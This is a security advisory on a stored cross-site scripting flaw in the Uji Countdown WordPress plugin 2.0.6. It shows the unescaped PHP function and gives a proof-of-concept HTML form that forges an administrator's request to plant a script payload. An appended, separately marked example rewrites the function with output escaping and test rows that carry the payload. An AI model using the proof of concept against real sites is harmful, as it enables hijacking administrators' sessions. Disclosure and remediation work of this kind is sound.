WordPress Uji Countdown 2.0.6 Cross Site Scripting

Posted on 03 August 2016

------------------------------------------------------------------------
Cross-Site Scripting in Uji Countdown WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Uji Countdown WordPress Plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker has to lure or force a logged-on WordPress Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0029

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Uji Countdown WordPress Plugin version 2.0.6.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Uji Countdown version 2.0.7.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_uji_countdown_wordpress_plugin.html

The issue exists in the file /classes/class-uji-countdown-admin.php and is caused by the lack of output encoding in the ujic_tabs_values() function. Every value read from the uji_counter table (time, title, style and id) is concatenated straight into the admin page's HTML:

private function ujic_tabs_values() {
    global $wpdb;
    $ujictab    = '';
    $table_name = $wpdb->prefix . "uji_counter";
    $ujic_datas = $wpdb->get_results( "SELECT * FROM $table_name ORDER BY `time` DESC" );
    if ( !empty( $ujic_datas ) ) {
        foreach ( $ujic_datas as $ujic ) {
            $ujic_style = !empty( $ujic->style ) ? $ujic->style : 'classic';
            // $ujic_style, $ujic->time, $ujic->title and $ujic->id come from the
            // database and are written into the HTML without esc_html()/esc_attr()/absint()
            $ujic_ico = '<span id="ujic-style-' . $ujic_style . '" class="ujic-types">' . $ujic_style . '</span>';
            $ujictab .= '<tr>
                <td>' . $ujic->time . '</td>
                <td>' . $ujic->title . '</td>
                <td>' . $ujic_ico . '</td>
                <td>
                    <a href="?page=uji-countdown&tab=tab_ujic_new&edit=' . $ujic->id . '"><i class="dashicons dashicons-welcome-write-blog"></i>Edit</a> |
                    <a href="options-general.php?page=uji-countdown&del=' . $ujic->id . '"><i class="dashicons dashicons-trash"></i> Delete</a>
                </td>
            </tr>';
        }
    }
    return $ujictab;
}

In order to exploit this issue, the attacker has to lure or force a logged-on WordPress Administrator into opening a malicious website.

Proof of concept

<html>
<body>
<form action="http://<target>/wp-admin/options-general.php?page=uji-countdown&tab=tab_ujic_new&style=classic&save=true" method="POST">
    <input type="hidden" name="ujic_style" value="classic" />
    <input type="hidden" name="ujic_name" value=""><script>alert(1);</script>" />
    <input type="hidden" name="ujic_goof" value="ABeeZee" />
    <input type="hidden" name="ujic_pos" value="center" />
    <input type="hidden" name="ujic_d" value="true" />
    <input type="hidden" name="ujic_h" value="true" />
    <input type="hidden" name="ujic_m" value="true" />
    <input type="hidden" name="ujic_s" value="true" />
    <input type="hidden" name="ujic_txt" value="true" />
    <input type="hidden" name="ujic_size" value="32" />
    <input type="hidden" name="ujic_col_dw" value="#a61ba6" />
    <input type="hidden" name="ujic_col_up" value="#c368c3" />
    <input type="hidden" name="ujic_col_txt" value="#ffffff" />
    <input type="hidden" name="ujic_col_sw" value="#000000" />
    <input type="hidden" name="ujic_col_lab" value="#000000" />
    <input type="hidden" name="ujic_lab_sz" value="13" />
    <input type="hidden" name="ujic_subscrFrmWidth" value="100" />
    <input type="hidden" name="ujic_subscrFrmAboveText" value="Join Our Newsletter" />
    <input type="hidden" name="ujic_subscrFrmInputText" value="Enter your email here" />
    <input type="hidden" name="ujic_subscrFrmSubmitText" value="Subscribe" />
    <input type="hidden" name="ujic_subscrFrmSubmitColor" value="#ab02b2" />
    <input type="hidden" name="ujic_subscrFrmThanksMessage" value="Thanks for subscribing" />
    <input type="hidden" name="ujic_subscrFrmErrorMessage" value="Invalid email address" />
    <input type="hidden" name="submit_ujic" value="Save Style" />
    <input type="submit" value="Submit request" />
</form>
</body>
</html>

------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its goal is to contribute to the security of popular, widely used OSS projects in a fun and educational way.
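The advisory names the missing output encoding in ujic_tabs_values() as the root cause. The following is an added example of what a hardened rewrite of that function looks like; it is not the plugin's own code and not the 2.0.7 fix. It assumes the same row shape (id, time, title, style) as the vulnerable function, takes the rows as a parameter instead of querying $wpdb so it can run outside WordPress, and shims the WordPress helpers esc_html(), esc_attr() and absint() with equivalent PHP calls when they are not defined. The list of allowed styles is an assumption; the page does not show which styles the plugin supports.

```php
<?php
// Added example (not the plugin's code): ujic_tabs_values() rewritten so that
// every database-sourced value is escaped before it is written into HTML.
// Run stand-alone with: php hardened_tabs.php

// Shims so the file runs outside WordPress; inside WordPress the real helpers win.
if ( ! function_exists( 'esc_html' ) ) {
    function esc_html( $text ) {
        return htmlspecialchars( (string) $text, ENT_QUOTES | ENT_HTML5, 'UTF-8' );
    }
}
if ( ! function_exists( 'esc_attr' ) ) {
    function esc_attr( $text ) {
        return htmlspecialchars( (string) $text, ENT_QUOTES | ENT_HTML5, 'UTF-8' );
    }
}
if ( ! function_exists( 'absint' ) ) {
    function absint( $maybeint ) {
        return abs( (int) $maybeint );
    }
}

/**
 * Render the countdown list rows from an array of row objects.
 * Inside the plugin the caller would pass $wpdb->get_results( ... ); taking the
 * rows as a parameter keeps this function testable without a database.
 */
function ujic_tabs_values_hardened( array $ujic_datas ) {
    // Assumption: the real plugin may support more styles than these two.
    $allowed_styles = array( 'classic', 'flat' );
    $ujictab = '';

    foreach ( $ujic_datas as $ujic ) {
        // Constrain the style to a known set instead of echoing the stored value back.
        $ujic_style = in_array( $ujic->style, $allowed_styles, true ) ? $ujic->style : 'classic';
        // The id is only ever numeric; absint() turns anything else into an integer.
        $id = absint( $ujic->id );

        $ujic_ico = '<span id="ujic-style-' . esc_attr( $ujic_style ) . '" class="ujic-types">'
                  . esc_html( $ujic_style ) . '</span>';

        $ujictab .= '<tr>'
            . '<td>' . esc_html( $ujic->time ) . '</td>'
            . '<td>' . esc_html( $ujic->title ) . '</td>' // the field the advisory's PoC poisons
            . '<td>' . $ujic_ico . '</td>'
            . '<td>'
            . '<a href="?page=uji-countdown&amp;tab=tab_ujic_new&amp;edit=' . $id . '">Edit</a> | '
            . '<a href="options-general.php?page=uji-countdown&amp;del=' . $id . '">Delete</a>'
            . '</td></tr>';
    }
    return $ujictab;
}

// Constructed sample rows: the second row carries the advisory's PoC payload in
// its title and attribute-breaking junk in its id and style.
$rows = array(
    (object) array( 'id' => 1, 'time' => '2016-07-24 12:00:00', 'title' => 'Launch', 'style' => 'classic' ),
    (object) array( 'id' => '2" onclick="x', 'time' => '2016-07-25 12:00:00',
                    'title' => '"><script>alert(1);</script>', 'style' => '"><img src=x>' ),
);

$html = ujic_tabs_values_hardened( $rows );
echo $html, PHP_EOL;
// The payload survives only as inert text: no raw "<script>" tag remains in the output.
var_dump( strpos( $html, '<script>' ) === false );
```

Two points worth noting. Escaping at the point of output is the right layer for this bug: the title is legitimately user-controlled, so sanitising it on input would only move the problem, while esc_html() at render time makes the stored value harmless regardless of how it got into the table. Separately, the PoC on this page is a cross-site form POST to the plugin's save handler, so that handler should also verify a WordPress nonce (check_admin_referer()) before writing to the table; the page does not show that handler, and this example does not cover it.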
